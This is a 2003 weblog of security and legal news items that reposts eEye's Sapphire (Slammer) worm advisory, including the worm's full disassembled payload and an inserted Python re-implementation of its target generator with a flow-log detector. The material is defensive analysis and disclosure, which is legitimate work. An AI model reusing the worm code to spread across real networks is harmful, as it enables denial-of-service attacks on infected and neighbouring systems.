Monday, 27. January 2003
Mobile code on the loose - worms break the internet again.
02:16
Len Sassaman: on locks
Len Sassaman: "Locksmiths generally don't discuss the plethora of ways to defeat standard physical security techniques with the general public. Sometimes I think they understand the issue of threat-models better than cryptographers do. They certainly understand that the public doesn't understand." [Hack the Planet]
02:26
Massive Network Attack was a deliberate attack against South Korea
So is this cyberwar against South Korea or a worm and bad journalism?
02:30
Junk-mail Foe Joe Is Caught Spamming
January 26, 2003 -- Hours after announcing he would run for president in 2004, Sen. Joseph Lieberman - a vocal opponent of "spam" - flooded the Internet with his own junk e-mail.
The notice broadcasting Lieberman's candidacy was sent to thousands of addresses purchased from ROPAC, a defunct political action committee that had compiled the list from a variety of sources, The Post has learned.
The tactic was surprising. Two years ago, Sen. Lieberman co-sponsored the anti-junk-mail legislation "CAN-SPAM." He stated at the time: "[Spam] is not requested by the receiver. It almost never contains any information of substance or value . . . only Congress has the power to regulate interstate commerce and address this problem on a national scale."
New York Post Jan 26 2003 6:04AM ET [moreover Computersecurity]
09:00
Could Attack on DALnet Spell End for IRC?
For at least a month, distributed denial of service, or DDOS, attacks have been crippling DALnet, one of the world's largest Internet Relay Chat networks, bringing it to its knees and raising the possibility that many hosting providers may refuse to host IRC servers at all. [LinuxSecurity.com]
09:01
A Google Win in SearchKing Case
In SearchKing v. Google the judge has denied SearchKing's request for a preliminary injunction. In other words, SearchKing asked for their old PageRank to be reinstated while the trial was being held, and the judge said no. LawMeme has the full story, including several interesting quotes from the judge's decision. The author has an interesting thought in the comments:

Let's step over into Bizarro world, where Badgle, the leading search engine, is run by Dr. Evil. Badgle uses familiar algorithms to rank pages, except that whenever its engineers find a page they don't like, they manually drop it down a hundred pages in the search results. And, interestingly enough, the only pages Badgle doesn't like are those that praise Austin Powers. Thus, when you run a Badgle search on "Austin Powers," you get back only pages making fun of his bad teeth. Whenever someone wonders why the leading Austin Powers fan page has a low ranking and asks Badgle what's going on, Badgle replies that the page's operator "was engaged in behavior that would lower the quality of Badgle's search results." Would this scenario change your point of view? Maybe not, but I suspect that there are many people who support Google whole-heartedly in this lawsuit, but who wouldn't be so willing to support Badgle's actions.

So this decision could have much farther-reaching effects than whether search engines can demote the PageRank of "spam kings". Stay tuned.... [Google Weblog]
09:02
SQL Sapphire Worm Analysis
Forwarded from: "Marc Maiffret" <marc@eeye.com>
SQL Sapphire Worm Analysis
Release Date:
1/25/03
Severity:
High
Systems Affected:
Microsoft SQL Server 2000 pre SP 2
Description:
Late Friday, January 24, 2003 we became aware of a new SQL worm
spreading quickly across various networks around the world.
The worm is spreading using a buffer overflow to exploit a flaw in
Microsoft SQL Server 2000. The SQL 2000 server flaw was discovered in
July, 2002 by Next Generation Security Software Ltd. The buffer
overflow exists because of the way SQL improperly handles data sent to
its Microsoft SQL Monitor port. Attackers leveraging this
vulnerability will be executing their code as SYSTEM, since Microsoft
SQL Server 2000 runs with SYSTEM privileges.
The worm works by generating pseudo-random IP addresses to try to
infect with its payload. The worm payload does not contain any
additional malicious content (in the form of backdoors etc.); however,
because of the nature of the worm and the speed at which it attempts
to re-infect systems, it can potentially create a denial-of-service
attack against infected networks.
We have been able to verify that multiple points of connectivity on
the Internet have been bogged down since 9pm Pacific Standard Time.
It should be noted that this worm is not the same as an earlier SQL
worm that used the SA/nopassword SQL vulnerability as its spread
vector. This new worm is more devastating as it is taking
advantage of a software-specific flaw rather than a configuration
error. We have already had many reports of smaller networks brought
down due to the flood of data from the Sapphire Worm trying to
re-infect new systems.
Corrective Action
We recommend that people immediately firewall SQL service ports at all
of their gateways. The worm uses only UDP port 1434 (SQL Monitor Port)
to spread itself to a new system; however, it is safe practice to
filter all SQL traffic at all gateways. The following is a list of
SQL server ports:
ms-sql-s 1433/tcp #Microsoft-SQL-Server
ms-sql-s 1433/udp #Microsoft-SQL-Server
ms-sql-m 1434/tcp #Microsoft-SQL-Monitor
ms-sql-m 1434/udp #Microsoft-SQL-Monitor
Once again this worm is taking advantage of a known vulnerability that
has had a patch available for many months. Microsoft has also released
a recent service pack for SQL (Service Pack 3) that includes a fix for
this vulnerability.
Standalone patch:
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS02-039.asp
SQL 2000 Service Pack 3:
http://www.microsoft.com/sql/downloads/2000/sp3.asp
Previous SQL Service Pack versions are vulnerable.
Technical Description
The following is a quick run-down of what the worm's payload is doing after
infection:
1. Retrieves the addresses of GetProcAddress and LoadLibrary from the
IAT in sqlsort.dll. It snags the necessary library base addresses and
function entry points as needed.
2. Calls GetTickCount, and uses the returned count as a pseudo-random seed.
3. Creates a UDP socket.
4. Performs a simple pseudo-random number generation formula using the
returned GetTickCount value to generate an IP address that will later
be used as the target.
5. Sends the worm payload in a SQL Server Resolution Service request to the
pseudo-random target address, on port 1434 (UDP).
6. Returns to the formula and continues generating new pseudo-random
addresses.
push 42B0C9DCh          ; [RET] sqlsort.dll -> jmp esp
mov eax, 1010101h       ; Reconstruct session: after the overflow the payload buffer
                        ; gets corrupted during program execution but before the
                        ; payload is executed.
xor ecx, ecx
mov cl, 18h
FIXUP:
push eax
loop FIXUP
xor eax, 5010101h
push eax
mov ebp, esp
push ecx
push 6C6C642Eh
push 32336C65h
push 6E72656Bh          ; kernel32
push ecx
push 746E756Fh          ; GetTickCount
push 436B6369h
push 54746547h
mov cx, 6C6Ch
push ecx
push 642E3233h          ; ws2_32.dll
push 5F327377h
mov cx, 7465h
push ecx
push 6B636F73h          ; socket
mov cx, 6F74h
push ecx
push 646E6573h          ; sendto
mov esi, 42AE1018h      ; IAT from sqlsort
lea eax, [ebp-2Ch]      ; (ws2_32.dll)
push eax
call dword ptr [esi]    ; call LoadLibrary
push eax
lea eax, [ebp-20h]
push eax
lea eax, [ebp-10h]      ; (kernel32.dll)
push eax
call dword ptr [esi]    ; LoadLibrary
push eax
mov esi, 42AE1010h      ; IAT from sqlsort
mov ebx, [esi]
mov eax, [ebx]
cmp eax, 51EC8B55h      ; check entry point fingerprint
jz short VALID_GP       ; Check entry point fingerprint for GetProcAddress; if it fails,
                        ; fall back to the GetProcAddress entry in another DLL version.
                        ; Undetermined what dll versions this will succeed on. Due
                        ; to the lack of reliable importing this may not work across all
                        ; dll versions.
mov esi, 42AE101Ch      ; IAT entry -> 77EA094C
VALID_GP:
call dword ptr [esi]    ; GetProcAddress
call eax                ; return from GetProcAddress = GetTickCount entry point
xor ecx, ecx
push ecx
push ecx
push eax
xor ecx, 9B040103h
xor ecx, 1010101h
push ecx                ; 9A050002 = port 1434 / AF_INET
lea eax, [ebp-34h]      ; (socket)
push eax
mov eax, [ebp-40h]      ; ws2_32 base address
push eax
call dword ptr [esi]    ; GetProcAddress
push 11h
push 2
push 2
call eax                ; socket
push eax
lea eax, [ebp-3Ch]      ; sendto
push eax
mov eax, [ebp-40h]      ; ws2_32 base address
push eax
call dword ptr [esi]    ; GetProcAddress
mov esi, eax            ; save sendto -> esi
or ebx, ebx
xor ebx, 0FFD9613Ch
PRND:
mov eax, [ebp-4Ch]      ; Pseudo Random Algorithm Start
lea ecx, [eax+eax*2]
lea edx, [eax+ecx*4]
shl edx, 4
add edx, eax
shl edx, 8
sub edx, eax
lea eax, [eax+edx*4]
add eax, ebx            ; Pseudo Random Algorithm End
mov [ebp-4Ch], eax
push 10h
lea eax, [ebp-50h]
push eax
xor ecx, ecx
push ecx
xor cx, 178h
push ecx
lea eax, [ebp+3]
push eax
mov eax, [ebp-54h]
push eax
call esi                ; sendto
jmp short PRND          ; Jump back to Pseudo Random Algorithm Start
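The address generator in the PRND block above, followed by a defender-side heuristic built on what the listing fixes about the worm's traffic, as an added example that is not part of the eEye advisory or of this blog. The first function mirrors the lea/shl/add/sub sequence instruction by instruction with 32-bit wraparound (the multiplier that falls out, 214013, is derived from those instructions and is not stated on the page) and stores the result little-endian into sin_addr the way the listing does at [ebp-4Ch] inside the sockaddr at [ebp-50h]. The second function scans flow records for sources that emit UDP datagrams of exactly 376 payload bytes (the 178h pushed before sendto) to many distinct destinations on port 1434, which is the scanning pattern the advisory recommends filtering at gateways. The seed, the increment value, the host addresses, the flow-record format and the threshold are all assumptions constructed for this example.

```python
"""Added example: Sapphire/Slammer target generator and a flow-log heuristic.

Not the eEye advisory's code; SEED, INC, the sample hosts and the flow
tuple format are constructed for illustration.
"""
from collections import defaultdict
import ipaddress

MASK32 = 0xFFFFFFFF
SQL_MONITOR_PORT = 1434      # UDP port the worm sends to (9A050002 in the listing)
WORM_DATAGRAM_LEN = 0x178    # 376: the length pushed before "call esi ; sendto"

# Constructed values: the real seed comes from GetTickCount and the real
# increment is whatever ebx holds after "xor ebx, 0FFD9613Ch".
SEED = 0x1234ABCD
INC = 0x00269EC5


def prnd_step(x, inc):
    """One pass through the PRND block, with 32-bit register wraparound."""
    ecx = (x + x * 2) & MASK32        # lea ecx, [eax+eax*2]
    edx = (x + ecx * 4) & MASK32      # lea edx, [eax+ecx*4]
    edx = (edx << 4) & MASK32         # shl edx, 4
    edx = (edx + x) & MASK32          # add edx, eax
    edx = (edx << 8) & MASK32         # shl edx, 8
    edx = (edx - x) & MASK32          # sub edx, eax
    eax = (x + edx * 4) & MASK32      # lea eax, [eax+edx*4]
    return (eax + inc) & MASK32       # add eax, ebx


def lcg_multiplier():
    """With inc=0 and x=1 the step returns the linear multiplier of the generator."""
    return prnd_step(1, 0)


def next_target(x):
    """Advance the generator and render the address as it lands in sin_addr.

    The listing writes eax to [ebp-4Ch], which is the sin_addr field of the
    sockaddr_in at [ebp-50h]; eax is stored little-endian, so the low byte of
    eax becomes the first octet on the wire.
    """
    x = prnd_step(x, INC)
    return x, str(ipaddress.IPv4Address(x.to_bytes(4, "little")))


def build_sample_flows(n=60):
    """Constructed flow records: (src, dst, proto, dport, udp_payload_len)."""
    flows = [
        ("192.168.1.20", "192.168.1.5", "tcp", 1433, 512),   # ordinary client query
        ("192.168.1.21", "192.168.1.5", "udp", 1434, 1),     # legitimate 1-byte SSRP probe
        ("192.168.1.21", "192.168.1.6", "udp", 1434, 1),
    ]
    x = SEED
    for _ in range(n):
        x, dst = next_target(x)
        flows.append(("10.0.0.7", dst, "udp", SQL_MONITOR_PORT, WORM_DATAGRAM_LEN))
    return flows


def flag_sapphire_scanners(flows, min_targets=20):
    """Return {src: distinct_targets} for hosts matching the worm's traffic shape.

    A flow exporter that reports IP total length will show 404 bytes
    (376 payload + 8 UDP + 20 IPv4); compare against the field you have.
    """
    targets = defaultdict(set)
    for src, dst, proto, dport, plen in flows:
        if proto == "udp" and dport == SQL_MONITOR_PORT and plen == WORM_DATAGRAM_LEN:
            targets[src].add(dst)
    return {src: len(d) for src, d in targets.items() if len(d) >= min_targets}


if __name__ == "__main__":
    print("multiplier:", lcg_multiplier())
    print("flagged:", flag_sapphire_scanners(build_sample_flows()))
```

The distinct-destination count is what separates the worm from a legitimate SQL Server Resolution Service client: a real client asks one or a few servers with a 1-byte probe, while an infected host emits a stream of identical 376-byte datagrams to addresses that have no relation to each other. Because the generator is a full-period linear congruential sequence modulo 2^32 when its increment is odd, consecutive targets never repeat, which is why the threshold on distinct destinations is reached almost immediately.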
In Closing
We have provided brief information here as we are currently working to
understand more of the worm's internal behavior. We will provide
updates as they become available.
This worm has been dubbed the "Sapphire Worm" by eEye due to the fact
that several engineers had to be pulled away from local bars to begin
the investigation/dissection process.
Credit:
Riley Hassell
Related Links:
SQLSecurity.com
http://sqlsecurity.com/
Microsoft Security Bulletin:
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms02-039.asp
Copyright (c) 1998-2003 eEye Digital Security
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express
consent of eEye. If you wish to reprint the whole or any part of this
alert in any other medium excluding electronic medium, please e-mail
alert@eEye.com for permission.
Disclaimer
The information within this paper may change without notice. Use of
this information constitutes acceptance for use in an AS IS condition.
There are NO warranties with regard to this information. In no event
shall the author be liable for any damages whatsoever arising out of
or in connection with the use or spread of this information. Any use
of this information is at the user's own risk.
Feedback
Please send suggestions, updates, and comments to:
eEye Digital Security
http://www.eEye.com
info@eEye.com [isn]
09:03
DoD offering admin privileges on .mil Web sites
Care to register a .mil Web site of your own for free? The DoD has gone out of its way to make it a snap. An unbelievably badly-protected admin interface welcomes you to register whatever domain you please (http://Rotten.mil anyone?), or edit anything they've already got. The interface is so ludicrously unprotected that it's been cached by Google and fails to mention that you must be authorized to muck about with it. Incredibly, default passwords are cheerfully provided on the page.
Following an anonymous tip from an observant Reg reader, we've encountered the page in question in the Google cache, and after a bit of our own poking about have also discovered an equally unprotected (and Google-cached) admin interface encouraging us to add a new user, like ourselves, say, which requires no authentication.
All you have to do is find that page and you can set yourself up with a user account, manage your new .mil Web site, fiddle about with other people's .mil Web sites, and generally make an incredible nuisance of yourself. We are, of course, straining against every natural, journalistic impulse in our beings by neglecting to mention any useful search strings with which to find it.
Another unprotected and cached page, this one discovered by our tipster, lists traffic to a major DoD Web site by URL/IP address. This worries us because it may list .mil sites and networked DoD machines that are not public, not hotlinked anywhere, and which might contain (or be networked with other machines that contain) sensitive data. Merely knowing that all those URLs and IP addys are valid and owned by DoD would give a significant advantage to attackers by narrowing their target area dramatically.
We have e-mailed the person who manages these sites - twice in fact - but so far have not been graced with a reply. We were hoping that they might be inclined to fix this mess quickly so that we could safely include the details in our report. Unfortunately we have to withhold them until we're confident that these security snafus are under control.
[The Register - Security]
09:04
What is source code? - The GPL's definition.
Last summer we had some discussion about the meaning of source code and object code; see some of it at:
Now Olaf Koglin points out that Richard Stallman thought about this a long time ago and found a very nice definition for the GPL:
The source code for a work means the preferred form of the work for making
modifications to it. For an executable work, complete source code means all the
source code for all modules it contains, plus any associated interface definition files,
plus the scripts used to control compilation and installation of the executable.
But it still has some problems. E.g. I have started using Unicode terminals and a Unicode-aware editor (XEmacs), and converted most of my plain-text files from latin1 to Unicode. Some of my newer Python source code is Unicode, too. Since Python does not grok Unicode source code as it should, a shell script does a recode utf-8..latin1 on the fly before executing. With the above definition the latin1 version of the source code would not be considered source code. I'm not sure if this is a desirable result.
We could say that the results of lossless transformations on the source code could still be considered source code - but isn't encryption a lossless transformation, too?
11:02
Source code, Binaries and NDAs
If you consider binaries as equivalent to source code, how could you give out a program (e.g. a hardware driver) and still comply with non-disclosure agreements you might have signed regarding the information manifested in the program?
E.g. when you want to develop a driver for special hardware, the hardware manufacturer will give you the technical specifications only if you sign an NDA keeping you from giving away the source code of the driver you are developing. This hurts many Free Software projects. But if 'Open Code = Closed Code' you can't even give away the binary driver.
11:04
How to distinguish software (programs) from data?
Olaf and I are looking for ways to distinguish software and (other) data. So what is a program?
In "Der Datenbegriff im Recht" we (Kay Schumann and I) suggest that distinguishing between programs and data is impractical.
There is an ugly catch. The law assumes they can be distinguished. Especially intellectual property law provides special rules for software.
So how to distinguish software (programs) from data?
12:30
Legal Books by Lenz
Karl-Friedrich Lenz is publishing several legal books (in German) under a Creative Commons License. More power to him!
13:41
comp.risks: Computer sabotage against Venezuela oil?
From: David Wagner <daw@cs.berkeley.edu>
Oil Daily quoted Ali Rodriguez (head of Venezuela's state oil company):
"[...] we have suffered many acts of sabotage at the terminals, the
refiners, and even to some well-heads in Lake Maracaibo. There were
even instances of computer hacking which did a lot of damage since
much of the operation is centrally controlled by computer."
[Source: *Oil Daily*, vol 53, no 9, 14 Jan 2003]
14:06
Supreme Court backs off on DVD descrambling code
NewsScan <newsscan@newsscan.com>
Mon, 06 Jan 2003 09:21:41 -0700
The U.S. Supreme Court has rescinded an emergency stay barring defendant Matthew Pavlovich from distributing DeCSS, a software utility that descrambles the digital lock on most DVDs to prevent copying them. Pavlovich is now free to distribute the code, but could be sued again if he decides to do so. "The entertainment companies need to stop pretending that DeCSS is a secret," says Cindy Cohn, legal director for the Electronic Frontier Foundation, which is assisting Pavlovich. "Justice O'Connor correctly saw that there was no need for emergency relief to keep DeCSS a secret. It doesn't pass the giggle test." The rescission is just the latest twist in a case that has been winding its way through the courts since 1999, when the DVD Copy Control Association -- a coalition of movie studios and consumer electronics makers -- filed a lawsuit against scores of people, alleging violations of California's trade secret laws.
[CNet News.com, 3 Jan 2003; NewsScan Daily, 6 Jan 2003]
http://news.com.com/2100-1023-979197.html?tag=fd_top
See also: http://md.hudora.de/blog/guids/53/32/2542302222754864.html
14:11
comp.risks: Man allegedly stalks ex-girlfriend with help of GPS
George Mannes <George.Mannes@thestreet.com>
Fri, 3 Jan 2003 11:57:23 -0500
The story starts here on The Smoking Gun (GPS angle appears at bottom of second page of typed complaint): http://www.thesmokinggun.com/archive/pseidler1.html
As far as I can guess (not confirmed) this is the product allegedly used: http://www.landairsea.com/Land%20Air%20Sea%20Smart%20Track%20Brochure.pdf
Now anyone, for better or worse, can be James Bond.
[A 42-year-old Wisconsin man is accused of stalking an ex-girlfriend by placing a GPS tracking device under the hood of her car. The device George refers to is called SmartTrack. PGN]
14:14
disLEXia, a research project by Maximillian Dornseif